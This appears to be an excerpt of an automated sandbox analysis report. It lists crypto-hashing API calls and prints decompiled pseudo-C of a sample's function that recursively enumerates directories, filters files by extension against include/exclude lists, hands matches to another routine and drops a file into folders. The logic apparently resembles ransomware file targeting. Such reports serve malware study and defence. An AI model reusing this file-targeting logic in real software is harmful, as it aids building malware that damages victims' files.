                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                    • _memset.LIBCMT ref: 004110CA
                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                    • _malloc.LIBCMT ref: 00411100
                                                                                    • _memset.LIBCMT ref: 0041110B
                                                                                    • _sprintf.LIBCMT ref: 0041112E
                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                    • String ID: %.2X
                                                                                    • API String ID: 2451520719-213608013
                                                                                    • Opcode ID: 81f91925b231181d7910d994450bf62fd2f5d2feca906d01a1321c20b071e5ae
                                                                                    • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                    • Opcode Fuzzy Hash: 81f91925b231181d7910d994450bf62fd2f5d2feca906d01a1321c20b071e5ae
                                                                                    • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v17;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _v32;
                                                                                    				char _v48;
                                                                                    				void* _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				signed int _v60;
                                                                                    				signed int _v64;
                                                                                    				signed int _v80;
                                                                                    				signed int _v84;
                                                                                    				signed int _v88;
                                                                                    				WCHAR* _v92;
                                                                                    				short _v104;
                                                                                    				signed int _v108;
                                                                                    				signed int _v112;
                                                                                    				char _v128;
                                                                                    				signed int _v132;
                                                                                    				signed int _v136;
                                                                                    				short _v152;
                                                                                    				char _v156;
                                                                                    				signed int _v160;
                                                                                    				signed int _v164;
                                                                                    				short _v180;
                                                                                    				intOrPtr _v184;
                                                                                    				char _v204;
                                                                                    				struct _WIN32_FIND_DATAW _v796;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				intOrPtr _t305;
                                                                                    				intOrPtr _t315;
                                                                                    				WCHAR* _t322;
                                                                                    				void* _t323;
                                                                                    				void* _t326;
                                                                                    				signed int _t330;
                                                                                    				signed int _t331;
                                                                                    				int _t333;
                                                                                    				signed int _t335;
                                                                                    				signed int _t336;
                                                                                    				intOrPtr _t340;
                                                                                    				intOrPtr _t346;
                                                                                    				intOrPtr* _t348;
                                                                                    				void* _t349;
                                                                                    				void* _t352;
                                                                                    				intOrPtr* _t354;
                                                                                    				void* _t355;
                                                                                    				intOrPtr* _t356;
                                                                                    				void* _t357;
                                                                                    				void* _t374;
                                                                                    				signed int _t380;
                                                                                    				WCHAR* _t381;
                                                                                    				WCHAR* _t392;
                                                                                    				WCHAR* _t394;
                                                                                    				void* _t451;
                                                                                    				void* _t457;
                                                                                    				signed int _t458;
                                                                                    				signed int _t460;
                                                                                    				WCHAR* _t461;
                                                                                    				intOrPtr _t462;
                                                                                    				intOrPtr _t463;
                                                                                    				void* _t464;
                                                                                    				intOrPtr* _t467;
                                                                                    				signed int _t469;
                                                                                    				intOrPtr* _t472;
                                                                                    				signed int _t474;
                                                                                    				char* _t481;
                                                                                    				char* _t482;
                                                                                    				intOrPtr* _t484;
                                                                                    				signed int _t486;
                                                                                    				intOrPtr* _t488;
                                                                                    				short* _t494;
                                                                                    				signed int _t497;
                                                                                    				signed int _t500;
                                                                                    				WCHAR* _t501;
                                                                                    				short* _t502;
                                                                                    				signed int _t507;
                                                                                    				intOrPtr* _t515;
                                                                                    				void* _t517;
                                                                                    				void* _t518;
                                                                                    				void* _t519;
                                                                                    				intOrPtr _t523;
                                                                                    				intOrPtr _t524;
                                                                                    				signed int _t525;
                                                                                    				signed int _t528;
                                                                                    				WCHAR* _t529;
                                                                                    				intOrPtr _t531;
                                                                                    				void* _t537;
                                                                                    				signed int* _t538;
                                                                                    				void* _t540;
                                                                                    				intOrPtr* _t541;
                                                                                    				intOrPtr* _t542;
                                                                                    				WCHAR* _t543;
                                                                                    				short _t544;
                                                                                    				intOrPtr _t545;
                                                                                    				void* _t546;
                                                                                    				void* _t547;
                                                                                    				short* _t549;
                                                                                    				void* _t550;
                                                                                    				short* _t551;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4cab09);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t545;
                                                                                    				_t546 = _t545 - 0x30c;
                                                                                    				_t456 = __edx;
                                                                                    				_v56 = __ecx;
                                                                                    				_v24 = __edx;
                                                                                    				_v8 = 0;
                                                                                    				E00411AB0();
                                                                                    				_t528 = 0;
                                                                                    				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
                                                                                    				_v52 = _t537;
                                                                                    				if(_t537 == 0) {
                                                                                    					L15:
                                                                                    					_v108 = 7;
                                                                                    					_v112 = 0;
                                                                                    					_v128 = 0;
                                                                                    					_v8 = 3;
                                                                                    					_push(0xffffffff);
                                                                                    					_v64 = 0;
                                                                                    					_v80 = 0;
                                                                                    					_v60 = 7;
                                                                                    					E00414690(_t456,  &_v80,  &_a4, 0);
                                                                                    					_v8 = 4;
                                                                                    					_t457 = PathFindFileNameW;
                                                                                    					_t302 =  >=  ? _v80 :  &_v80;
                                                                                    					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
                                                                                    					_v132 = 7;
                                                                                    					_v136 = 0;
                                                                                    					_v152 = 0;
                                                                                    					if( *_t515 != 0) {
                                                                                    						_t467 = _t515;
                                                                                    						_t77 = _t467 + 2; // 0x2
                                                                                    						_t537 = _t77;
                                                                                    						do {
                                                                                    							_t305 =  *_t467;
                                                                                    							_t467 = _t467 + 2;
                                                                                    						} while (_t305 != 0);
                                                                                    						_t469 = _t467 - _t537 >> 1;
                                                                                    						goto L24;
                                                                                    					} else {
                                                                                    						_t469 = 0;
                                                                                    						L24:
                                                                                    						_push(_t469);
                                                                                    						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
                                                                                    						_v8 = 5;
                                                                                    						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
                                                                                    						if( &_v80 != _t538) {
                                                                                    							if(_v60 >= 8) {
                                                                                    								L00422587(_v80);
                                                                                    								_t546 = _t546 + 4;
                                                                                    							}
                                                                                    							_v60 = 7;
                                                                                    							_v64 = 0;
                                                                                    							_v80 = 0;
                                                                                    							if(_t538[5] >= 8) {
                                                                                    								_v80 =  *_t538;
                                                                                    								 *_t538 = 0;
                                                                                    							} else {
                                                                                    								_t430 = _t538[4] + 1;
                                                                                    								if(_t538[4] + 1 != 0) {
                                                                                    									E004205A0( &_v80, _t538, _t430 + _t430);
                                                                                    									_t546 = _t546 + 0xc;
                                                                                    								}
                                                                                    							}
                                                                                    							_v64 = _t538[4];
                                                                                    							_v60 = _t538[5];
                                                                                    							_t538[5] = 7;
                                                                                    							_t538[4] = 0;
                                                                                    							 *_t538 = 0;
                                                                                    						}
                                                                                    						if(_v28 >= 8) {
                                                                                    							L00422587(_v48);
                                                                                    							_t546 = _t546 + 4;
                                                                                    						}
                                                                                    						_t529 = 0;
                                                                                    						while(_v64 != 0 || _v136 != 0) {
                                                                                    							_t529 =  &(_t529[0]);
                                                                                    							_t313 =  >=  ? _v80 :  &_v80;
                                                                                    							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
                                                                                    							if( *_t515 != 0) {
                                                                                    								_t472 = _t515;
                                                                                    								_t107 = _t472 + 2; // 0x2
                                                                                    								_t538 = _t107;
                                                                                    								do {
                                                                                    									_t315 =  *_t472;
                                                                                    									_t472 = _t472 + 2;
                                                                                    								} while (_t315 != 0);
                                                                                    								_t474 = _t472 - _t538 >> 1;
                                                                                    								L42:
                                                                                    								_push(_t474);
                                                                                    								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
                                                                                    								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
                                                                                    								if( &_v80 != _t538) {
                                                                                    									if(_v60 >= 8) {
                                                                                    										L00422587(_v80);
                                                                                    										_t546 = _t546 + 4;
                                                                                    									}
                                                                                    									_v60 = 7;
                                                                                    									_v64 = 0;
                                                                                    									_v80 = 0;
                                                                                    									if(_t538[5] >= 8) {
                                                                                    										_v80 =  *_t538;
                                                                                    										 *_t538 = 0;
                                                                                    									} else {
                                                                                    										_t418 = _t538[4] + 1;
                                                                                    										if(_t538[4] + 1 != 0) {
                                                                                    											E004205A0( &_v80, _t538, _t418 + _t418);
                                                                                    											_t546 = _t546 + 0xc;
                                                                                    										}
                                                                                    									}
                                                                                    									_v64 = _t538[4];
                                                                                    									_v60 = _t538[5];
                                                                                    									_t538[5] = 7;
                                                                                    									_t538[4] = 0;
                                                                                    									 *_t538 = 0;
                                                                                    								}
                                                                                    								if(_v28 >= 8) {
                                                                                    									L00422587(_v48);
                                                                                    									_t546 = _t546 + 4;
                                                                                    								}
                                                                                    								continue;
                                                                                    							}
                                                                                    							_t474 = 0;
                                                                                    							goto L42;
                                                                                    						}
                                                                                    						if(_t529 > 3) {
                                                                                    							L73:
                                                                                    							_t322 = E00417140( &_v104,  &_a4, "*");
                                                                                    							_t547 = _t546 + 4;
                                                                                    							if(_t322[0xa] >= 8) {
                                                                                    								_t322 =  *_t322;
                                                                                    							}
                                                                                    							_t323 = FindFirstFileW(_t322,  &_v796);
                                                                                    							_v52 = _t323;
                                                                                    							if(_v84 >= 8) {
                                                                                    								L00422587(_v104);
                                                                                    								_t323 = _v52;
                                                                                    								_t547 = _t547 + 4;
                                                                                    							}
                                                                                    							_v84 = 7;
                                                                                    							_t458 = 0;
                                                                                    							_v88 = 0;
                                                                                    							_v104 = 0;
                                                                                    							_v24 = 0;
                                                                                    							if(_t323 == 0xffffffff) {
                                                                                    								L139:
                                                                                    								if(_v132 >= 8) {
                                                                                    									L00422587(_v152);
                                                                                    									_t547 = _t547 + 4;
                                                                                    								}
                                                                                    								_v132 = 7;
                                                                                    								_v136 = 0;
                                                                                    								_v152 = 0;
                                                                                    								if(_v60 >= 8) {
                                                                                    									L00422587(_v80);
                                                                                    									_t547 = _t547 + 4;
                                                                                    								}
                                                                                    								_v60 = 7;
                                                                                    								_v64 = 0;
                                                                                    								_v80 = 0;
                                                                                    								if(_v108 >= 8) {
                                                                                    									L00422587(_v128);
                                                                                    									_t547 = _t547 + 4;
                                                                                    								}
                                                                                    								_t326 = 0;
                                                                                    								_v108 = 7;
                                                                                    								_v112 = 0;
                                                                                    								_v128 = 0;
                                                                                    								goto L146;
                                                                                    							} else {
                                                                                    								_t540 = _v52;
                                                                                    								do {
                                                                                    									_t481 = ".";
                                                                                    									_t330 =  &(_v796.cFileName);
                                                                                    									while(1) {
                                                                                    										_t517 =  *_t330;
                                                                                    										if(_t517 !=  *_t481) {
                                                                                    											break;
                                                                                    										}
                                                                                    										if(_t517 == 0) {
                                                                                    											L84:
                                                                                    											_t331 = 0;
                                                                                    											L86:
                                                                                    											if(_t331 == 0) {
                                                                                    												goto L137;
                                                                                    											}
                                                                                    											_t482 = L"..";
                                                                                    											_t335 =  &(_v796.cFileName);
                                                                                    											while(1) {
                                                                                    												_t518 =  *_t335;
                                                                                    												if(_t518 !=  *_t482) {
                                                                                    													break;
                                                                                    												}
                                                                                    												if(_t518 == 0) {
                                                                                    													L92:
                                                                                    													_t336 = 0;
                                                                                    													L94:
                                                                                    													if(_t336 == 0) {
                                                                                    														goto L137;
                                                                                    													}
                                                                                    													if((_v796.dwFileAttributes & 0x00000010) == 0) {
                                                                                    														_t460 = _t458 + 1;
                                                                                    														_v24 = _t460;
                                                                                    														if(_t460 >= 0x400) {
                                                                                    															_v24 = 0;
                                                                                    															E00411AB0();
                                                                                    														}
                                                                                    														if(_a32 == 0) {
                                                                                    															goto L137;
                                                                                    														} else {
                                                                                    															_v28 = 7;
                                                                                    															_push(0xffffffff);
                                                                                    															_v48 = 0;
                                                                                    															_v32 = 0;
                                                                                    															E00414690(_t460,  &_v48,  &_a4, 0);
                                                                                    															_v8 = 9;
                                                                                    															if(_v796.cFileName != 0) {
                                                                                    																_t484 =  &(_v796.cFileName);
                                                                                    																_t241 = _t484 + 2; // 0x2
                                                                                    																_t519 = _t241;
                                                                                    																do {
                                                                                    																	_t340 =  *_t484;
                                                                                    																	_t484 = _t484 + 2;
                                                                                    																} while (_t340 != 0);
                                                                                    																_t486 = _t484 - _t519 >> 1;
                                                                                    																L108:
                                                                                    																_push(_t486);
                                                                                    																_t487 =  &_v48;
                                                                                    																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
                                                                                    																_t344 =  >=  ? _v48 :  &_v48;
                                                                                    																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
                                                                                    																_v17 = 0;
                                                                                    																_t346 = _v56;
                                                                                    																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
                                                                                    																_t531 =  *((intOrPtr*)(_t346 + 0x890));
                                                                                    																if(_t541 == _t531) {
                                                                                    																	L118:
                                                                                    																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
                                                                                    																	_t529 =  *(_t346 + 0x89c);
                                                                                    																	if(_t542 == _t529) {
                                                                                    																		L126:
                                                                                    																		if(_v17 == 0) {
                                                                                    																			_t348 = _t346 + 0x868;
                                                                                    																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
                                                                                    																				_t348 =  *_t348;
                                                                                    																			}
                                                                                    																			_push(_t461);
                                                                                    																			_push(_t348);
                                                                                    																			_t349 = E00421C02(_t487);
                                                                                    																			_t547 = _t547 + 8;
                                                                                    																			if(_t349 == 0) {
                                                                                    																				_t462 = _v56;
                                                                                    																				_t488 = _t462 + 0x820;
                                                                                    																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
                                                                                    																					_t488 =  *_t488;
                                                                                    																				}
                                                                                    																				_push(_t488);
                                                                                    																				_t351 =  >=  ? _v48 :  &_v48;
                                                                                    																				_push( >=  ? _v48 :  &_v48);
                                                                                    																				_t352 = E00421C02(_t488);
                                                                                    																				_t547 = _t547 + 8;
                                                                                    																				if(_t352 == 0) {
                                                                                    																					_t521 =  >=  ? _v48 :  &_v48;
                                                                                    																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
                                                                                    																				}
                                                                                    																			}
                                                                                    																		}
                                                                                    																		L134:
                                                                                    																		_v8 = 5;
                                                                                    																		if(_v28 >= 8) {
                                                                                    																			L00422587(_v48);
                                                                                    																			_t547 = _t547 + 4;
                                                                                    																		}
                                                                                    																		_t540 = _v52;
                                                                                    																		goto L137;
                                                                                    																	}
                                                                                    																	L120:
                                                                                    																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
                                                                                    																		_t354 = _t542;
                                                                                    																	} else {
                                                                                    																		_t354 =  *_t542;
                                                                                    																	}
                                                                                    																	_t487 =  &(_v796.cFileName);
                                                                                    																	_push( &(_v796.cFileName));
                                                                                    																	_push(_t354);
                                                                                    																	_t355 = E00421C02( &(_v796.cFileName));
                                                                                    																	_t547 = _t547 + 8;
                                                                                    																	if(_t355 != 0) {
                                                                                    																		goto L134;
                                                                                    																	}
                                                                                    																	_t542 = _t542 + 0x18;
                                                                                    																	if(_t542 != _t529) {
                                                                                    																		goto L120;
                                                                                    																	}
                                                                                    																	_t346 = _v56;
                                                                                    																	goto L126;
                                                                                    																}
                                                                                    																L110:
                                                                                    																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
                                                                                    																	_t356 = _t541;
                                                                                    																} else {
                                                                                    																	_t356 =  *_t541;
                                                                                    																}
                                                                                    																_push(_t461);
                                                                                    																_push(_t356);
                                                                                    																_t357 = E00421C02(_t487);
                                                                                    																_t547 = _t547 + 8;
                                                                                    																if(_t357 != 0) {
                                                                                    																	goto L116;
                                                                                    																}
                                                                                    																_t541 = _t541 + 0x18;
                                                                                    																if(_t541 != _t531) {
                                                                                    																	goto L110;
                                                                                    																}
                                                                                    																L117:
                                                                                    																_t346 = _v56;
                                                                                    																goto L118;
                                                                                    																L116:
                                                                                    																_v17 = 1;
                                                                                    																goto L117;
                                                                                    															}
                                                                                    															_t486 = 0;
                                                                                    															goto L108;
                                                                                    														}
                                                                                    													}
                                                                                    													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
                                                                                    													_t547 = _t547 + 4;
                                                                                    													_push(1);
                                                                                    													_v8 = 7;
                                                                                    													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
                                                                                    													_v160 = 7;
                                                                                    													_v164 = 0;
                                                                                    													_v180 = 0;
                                                                                    													_push(0xffffffff);
                                                                                    													_v8 = 8;
                                                                                    													E00414690(_t458,  &_v180,  &_v204, 0);
                                                                                    													_v156 = 0;
                                                                                    													E00413B70(_a28,  &_v180);
                                                                                    													if(_v160 >= 8) {
                                                                                    														L00422587(_v180);
                                                                                    														_t547 = _t547 + 4;
                                                                                    													}
                                                                                    													_v8 = 5;
                                                                                    													_v160 = 7;
                                                                                    													_v164 = 0;
                                                                                    													_v180 = 0;
                                                                                    													if(_v184 >= 8) {
                                                                                    														L00422587(_v204);
                                                                                    														_t547 = _t547 + 4;
                                                                                    													}
                                                                                    													goto L137;
                                                                                    												}
                                                                                    												_t523 =  *((intOrPtr*)(_t335 + 2));
                                                                                    												_t204 =  &(_t482[2]); // 0x2e
                                                                                    												if(_t523 !=  *_t204) {
                                                                                    													break;
                                                                                    												}
                                                                                    												_t335 = _t335 + 4;
                                                                                    												_t482 =  &(_t482[4]);
                                                                                    												if(_t523 != 0) {
                                                                                    													continue;
                                                                                    												}
                                                                                    												goto L92;
                                                                                    											}
                                                                                    											asm("sbb eax, eax");
                                                                                    											_t336 = _t335 | 0x00000001;
                                                                                    											goto L94;
                                                                                    										}
                                                                                    										_t524 =  *((intOrPtr*)(_t330 + 2));
                                                                                    										_t201 =  &(_t481[2]); // 0x2e0000
                                                                                    										if(_t524 !=  *_t201) {
                                                                                    											break;
                                                                                    										}
                                                                                    										_t330 = _t330 + 4;
                                                                                    										_t481 =  &(_t481[4]);
                                                                                    										if(_t524 != 0) {
                                                                                    											continue;
                                                                                    										}
                                                                                    										goto L84;
                                                                                    									}
                                                                                    									asm("sbb eax, eax");
                                                                                    									_t331 = _t330 | 0x00000001;
                                                                                    									goto L86;
                                                                                    									L137:
                                                                                    									_t333 = FindNextFileW(_t540,  &_v796);
                                                                                    									_t458 = _v24;
                                                                                    								} while (_t333 != 0);
                                                                                    								FindClose(_t540);
                                                                                    								goto L139;
                                                                                    							}
                                                                                    						}
                                                                                    						_t549 = _t546 - 0x18;
                                                                                    						_t494 = _t549;
                                                                                    						_push(0xffffffff);
                                                                                    						 *(_t494 + 0x14) = 7;
                                                                                    						 *(_t494 + 0x10) = 0;
                                                                                    						 *_t494 = 0;
                                                                                    						E00414690(_t457, _t494,  &_a4, 0);
                                                                                    						_t374 = E0040F310(_t529, _t538);
                                                                                    						_t546 = _t549 + 0x18;
                                                                                    						if(_t374 != 0) {
                                                                                    							goto L73;
                                                                                    						}
                                                                                    						_push(0xffffffff);
                                                                                    						E00414690(_t457,  &_v128,  &_a4, 0);
                                                                                    						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
                                                                                    						_v8 = 6;
                                                                                    						_t497 = 0;
                                                                                    						_t380 = _v112;
                                                                                    						_t543 = _v92;
                                                                                    						if(_t380 == 0) {
                                                                                    							L57:
                                                                                    							_t463 = _v56;
                                                                                    							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
                                                                                    							_t381 = _t463 + 0x820;
                                                                                    							if(_t381[0xa] >= 8) {
                                                                                    								_t381 =  *_t381;
                                                                                    							}
                                                                                    							PathAppendW(_t543, _t381);
                                                                                    							_push(_v24);
                                                                                    							_v28 = 7;
                                                                                    							_v32 = 0;
                                                                                    							_v48 = 0;
                                                                                    							E00418400( &_v48, _t543, _v88);
                                                                                    							if(_v108 >= 8) {
                                                                                    								L00422587(_v128);
                                                                                    								_t546 = _t546 + 4;
                                                                                    							}
                                                                                    							_t500 = _v28;
                                                                                    							_v108 = 7;
                                                                                    							_v112 = 0;
                                                                                    							_v128 = 0;
                                                                                    							if(_t500 >= 8) {
                                                                                    								_v128 = _v48;
                                                                                    							} else {
                                                                                    								_t402 = _v32 + 1;
                                                                                    								if(_v32 + 1 != 0) {
                                                                                    									E004205A0( &_v128,  &_v48, _t402 + _t402);
                                                                                    									_t500 = _v28;
                                                                                    									_t546 = _t546 + 0xc;
                                                                                    								}
                                                                                    							}
                                                                                    							_v112 = _v32;
                                                                                    							_t389 =  >=  ? _v128 :  &_v128;
                                                                                    							_v108 = _t500;
                                                                                    							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
                                                                                    								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
                                                                                    								_t501 = _t463 + 0x838;
                                                                                    								_t550 = _t546 + 4;
                                                                                    								_t529 = _t392;
                                                                                    								if(_t501[0xa] >= 8) {
                                                                                    									_t501 =  *_t501;
                                                                                    								}
                                                                                    								lstrcpyW(_t529, _t501);
                                                                                    								_t394 = _t463 + 0x850;
                                                                                    								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
                                                                                    									_t394 =  *_t394;
                                                                                    								}
                                                                                    								lstrcatW(_t529, _t394);
                                                                                    								_t551 = _t550 - 0x18;
                                                                                    								_t502 = _t551;
                                                                                    								_push(0xffffffff);
                                                                                    								 *(_t502 + 0x14) = 7;
                                                                                    								 *(_t502 + 0x10) = 0;
                                                                                    								 *_t502 = 0;
                                                                                    								E00414690(_t463, _t502,  &_v128, 0);
                                                                                    								E0040F0E0(_t529);
                                                                                    								E00420BED(_t529);
                                                                                    								_t546 = _t551 + 0x1c;
                                                                                    							}
                                                                                    							_v8 = 5;
                                                                                    							if(_t543 != 0) {
                                                                                    								L00422587(_t543);
                                                                                    								_t546 = _t546 + 4;
                                                                                    							}
                                                                                    							goto L73;
                                                                                    						}
                                                                                    						do {
                                                                                    							_t409 =  >=  ? _v128 :  &_v128;
                                                                                    							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
                                                                                    							_t497 = _t497 + 1;
                                                                                    							_t380 = _v112;
                                                                                    						} while (_t497 < _t380);
                                                                                    						goto L57;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t464 = 0;
                                                                                    					do {
                                                                                    						_v28 = 7;
                                                                                    						_push(0xffffffff);
                                                                                    						_v48 = 0;
                                                                                    						_v32 = 0;
                                                                                    						E00414690(_t464,  &_v48,  &_a4, 0);
                                                                                    						_v8 = 1;
                                                                                    						_push(0xffffffff);
                                                                                    						_v104 = 0;
                                                                                    						_v84 = 7;
                                                                                    						_v88 = 0;
                                                                                    						E00414690(_t464,  &_v104,  *_v24 + _t464, 0);
                                                                                    						_v8 = 2;
                                                                                    						_t525 = _v32;
                                                                                    						if(_t525 <= 1) {
                                                                                    							L10:
                                                                                    							if(_v84 >= 8) {
                                                                                    								L00422587(_v104);
                                                                                    								_t546 = _t546 + 4;
                                                                                    							}
                                                                                    							_v84 = 7;
                                                                                    							_v8 = 0;
                                                                                    							_v88 = 0;
                                                                                    							_v104 = 0;
                                                                                    							if(_v28 >= 8) {
                                                                                    								L00422587(_v48);
                                                                                    								_t546 = _t546 + 4;
                                                                                    							}
                                                                                    							goto L14;
                                                                                    						}
                                                                                    						_t507 = _v88;
                                                                                    						if(_t507 <= 1) {
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							_t446 =  >=  ? _v48 :  &_v48;
                                                                                    							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
                                                                                    								_push(1);
                                                                                    								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
                                                                                    								_t507 = _v88;
                                                                                    							}
                                                                                    							_t544 = _v104;
                                                                                    							_t448 =  >=  ? _t544 :  &_v104;
                                                                                    							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
                                                                                    								_push(1);
                                                                                    								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
                                                                                    								_t544 = _v104;
                                                                                    							}
                                                                                    							_t509 =  >=  ? _t544 :  &_v104;
                                                                                    							_t450 =  >=  ? _v48 :  &_v48;
                                                                                    							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
                                                                                    							_t547 = _t546 + 8;
                                                                                    							if(_t451 == 0) {
                                                                                    								if(_v84 >= 8) {
                                                                                    									L00422587(_v104);
                                                                                    									_t547 = _t547 + 4;
                                                                                    								}
                                                                                    								_t326 = 0;
                                                                                    								_v84 = 7;
                                                                                    								_v88 = 0;
                                                                                    								_v104 = 0;
                                                                                    								if(_v28 >= 8) {
                                                                                    									_t326 = L00422587(_v48);
                                                                                    									_t547 = _t547 + 4;
                                                                                    								}
                                                                                    								L146:
                                                                                    								if(_a24 >= 8) {
                                                                                    									_t326 = L00422587(_a4);
                                                                                    								}
                                                                                    								 *[fs:0x0] = _v16;
                                                                                    								return _t326;
                                                                                    							} else {
                                                                                    								_t537 = _v52;
                                                                                    								goto L10;
                                                                                    							}
                                                                                    						}
                                                                                    						L14:
                                                                                    						_t528 = _t528 + 1;
                                                                                    						_t464 = _t464 + 0x18;
                                                                                    					} while (_t528 < _t537);
                                                                                    					goto L15;
                                                                                    				}
                                                                                    			}










































































































                                                                                    0x0040fadf
                                                                                    0x0040fad0
                                                                                    0x0040faf2
                                                                                    0x0040faf8
                                                                                    0x0040fafd
                                                                                    0x0040fb04
                                                                                    0x0040fb0b
                                                                                    0x0040fb0b
                                                                                    0x0040fb12
                                                                                    0x0040fb1b
                                                                                    0x0040fb20
                                                                                    0x0040fb20
                                                                                    0x00000000
                                                                                    0x0040fb12
                                                                                    0x0040fa5b
                                                                                    0x00000000
                                                                                    0x0040fa5b
                                                                                    0x0040fb2b
                                                                                    0x0040fcf0
                                                                                    0x0040fcfb
                                                                                    0x0040fd00
                                                                                    0x0040fd07
                                                                                    0x0040fd09
                                                                                    0x0040fd09
                                                                                    0x0040fd13
                                                                                    0x0040fd1d
                                                                                    0x0040fd20
                                                                                    0x0040fd25
                                                                                    0x0040fd2a
                                                                                    0x0040fd2d
                                                                                    0x0040fd2d
                                                                                    0x0040fd32
                                                                                    0x0040fd39
                                                                                    0x0040fd3b
                                                                                    0x0040fd42
                                                                                    0x0040fd46
                                                                                    0x0040fd4c
                                                                                    0x00410072
                                                                                    0x00410076
                                                                                    0x0041007e
                                                                                    0x00410083
                                                                                    0x00410083
                                                                                    0x00410088
                                                                                    0x00410093
                                                                                    0x0041009d
                                                                                    0x004100a4
                                                                                    0x004100a9
                                                                                    0x004100ae
                                                                                    0x004100ae
                                                                                    0x004100b3
                                                                                    0x004100be
                                                                                    0x004100c5
                                                                                    0x004100c9
                                                                                    0x004100ce
                                                                                    0x004100d3
                                                                                    0x004100d3
                                                                                    0x004100d6
                                                                                    0x004100d8
                                                                                    0x004100df
                                                                                    0x004100e6
                                                                                    0x00000000
                                                                                    0x0040fd52
                                                                                    0x0040fd52
                                                                                    0x0040fd60
                                                                                    0x0040fd60
                                                                                    0x0040fd65
                                                                                    0x0040fd70
                                                                                    0x0040fd70
                                                                                    0x0040fd76
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fd7b
                                                                                    0x0040fd92
                                                                                    0x0040fd92
                                                                                    0x0040fd9b
                                                                                    0x0040fd9d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fda3
                                                                                    0x0040fda8
                                                                                    0x0040fdb0
                                                                                    0x0040fdb0
                                                                                    0x0040fdb6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fdbb
                                                                                    0x0040fdd2
